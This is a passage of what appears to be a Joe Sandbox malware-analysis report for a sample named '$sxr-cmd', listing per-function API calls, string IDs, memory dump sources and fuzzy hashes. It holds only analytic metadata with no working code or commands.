                                                                                                                        • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF61550074D
                                                                                                                        • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF615500762
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF6154FB518
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF6154FB58B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                      • String ID: ELSE$IF/?
                                                                                                                      • API String ID: 3223794493-1134991328
                                                                                                                      • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                      • Instruction ID: 6717c937f5e1b3b0c8c4bd42f7cef92b6425a0e97f37be57df7312fd1e23a2e3
                                                                                                                      • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                      • Instruction Fuzzy Hash: A6413835E09E43C2FA649F6CA4112B9A7A1AF46F68F546036D54EC76B5EF3CEC208701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$File_get_osfhandle$PointerReadlongjmp
• String ID:
• API String ID: 1532185241-0
• Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
• Instruction ID: 174b6ccaff31030ecbc139f8072b55f17b836355c52b09e6150a361805b7635b
• Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
• Instruction Fuzzy Hash: 66419D36A04A518BE7549F21948557DBFA1FB88FA0F459535EA0A837A1CF3CEC418700
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorFileLast$DeleteRead_get_osfhandle
• String ID:
• API String ID: 3588551418-0
• Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
• Instruction ID: 7718d184248390872431a5ac4b4b74619e90aeb218cf85a6950effa8b56d578e
• Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
• Instruction Fuzzy Hash: F5416F79A08A428BE7549F15A49027DF761EF85FA1F14403AD64EC77A1CF3CEC408780
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorModememset$FullNamePath_wcsicmp
• String ID:
• API String ID: 2123716050-0
• Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
• Instruction ID: 2ea282085da4ecf76a9724d055da6f56cf404363a66b57373bb8128daac7b012
• Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
• Instruction Fuzzy Hash: 9D419536705BC18AEB718F25D8903E9A7A4FB49F9CF444135DA4D8AAA9DF3CD6448700
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
• String ID:
• API String ID: 3114114779-0
• Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
• Instruction ID: 0a10b3110482f6df5d8d8b000d71f84899aeb7c0a0de8e124679bc8ed9f3c66d
• Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
• Instruction Fuzzy Hash: 9041F736A05E42CAEB00CF79D4802ACBBA5FB88F58F554136DA0D93B64DF38E9568750
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A77A
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A7AF
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A80E
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A839
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A850
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: QueryValue$CloseErrorLastOpen
• String ID:
• API String ID: 2240656346-0
• Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
• Instruction ID: 0ae3cc092ae08aaeb107d338dacee4f518e117ef9645092a324e52652b4687ed
• Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
• Instruction Fuzzy Hash: 24318B3AA18E4192E7118F24E480569FBF5FB89FA0F554035EA4E82764DF3CDC41CB40
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF6155001B8: _get_osfhandle.MSVCRT ref: 00007FF6155001C4
  • Part of subcall function 00007FF6155001B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF6155001D6
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF61551D0F9
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF61551D10F
• ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF61551D166
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF61551D17A
• SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF61551D18C
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
• String ID:
• API String ID: 3008996577-0
• Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
• Instruction ID: 57d24f8bc0841c36b5d9bba1c6af11819cfd99d1ee2735a16d4e4e464ff49653
• Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
• Instruction Fuzzy Hash: FA215C2AB14A41CAE7009B71E8400BDB7B0FB8DF65B445125DE4D93B69EF38D441CB14
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: 505527e6e766f6252cc75d56a5348e578c7830a1af3cc1d60b9eeb1fb2835866
• Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction Fuzzy Hash: 62119422A7DB0201F65C11E7D45D36F10A3AB57374EC40624BAFF2EED7BA2649415200
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: abd8314576678b675f38856d93150327ec156046a275fb1cc8adf56ad844f934
• Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction Fuzzy Hash: DE11C422A0DB0103F658A1E5D45D36540F36F67B70E940638EA7E2F2D7AB1B4D814200
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID:
• API String ID: 1092925422-0
• Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
• Instruction ID: 22be293b0064e3789735749459075c394cc6aa00c845e6bca34463c908d19b7d
• Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
• Instruction Fuzzy Hash: A6114236A0AB4087FB24CB92E44965977B2F745B90F844125DE4D0B795FF3EC544C744
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                      APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF61551C9EE,?,?,?,00007FF61551EA6C,?,?,?,00007FF61551E925), ref: 00007FF615505CCB
• GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00007FF61551C9EE,?,?,?,00007FF61551EA6C,?,?,?,00007FF61551E925), ref: 00007FF615505CDF
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF615505D03
• fprintf.MSVCRT ref: 00007FF61550F4A9
• fflush.MSVCRT ref: 00007FF61550F4C2
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
• String ID:
• API String ID: 1826527819-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: CreateSemaphore
• String ID: _p0$wil
• API String ID: 1078844751-1814513734
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF61551B934
• GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF615505085), ref: 00007FF61551B9A5
• GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF615505085), ref: 00007FF61551B9F7
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Global$AllocAsciizCreateFreeFromStringUnicode
• String ID: %WINDOWS_COPYRIGHT%
• API String ID: 1103618819-1745581171
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$_wcslwr
• String ID: [%s]
• API String ID: 886762496-302437576
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: iswspace
• String ID: off
• API String ID: 2389812497-733764931
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess
• String ID: %s=%s$DPATH$PATH
• API String ID: 3731854180-3148396303
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: wcscmp
• String ID: *.*$????????.???
• API String ID: 3392835482-3870530610
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: fprintf
• String ID: CMD Internal Error %s$%s$Null environment
• API String ID: 383729395-2781220306
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: iswspacewcschr
• String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
• API String ID: 287713880-1183017076
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: KERNEL32.DLL$SetThreadUILanguage
• API String ID: 1646373207-2530943252
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
• API String ID: 1646373207-919018592
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$CurrentDirectorytowupper
• String ID:
• API String ID: 1403193329-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: _wcsnicmp$wcschr
• String ID:
• API String ID: 3270668897-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$DriveFullNamePathType
• String ID:
• API String ID: 3442494845-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcstol$lstrcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3515581199-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File_get_osfhandle$TimeWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4019809305-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
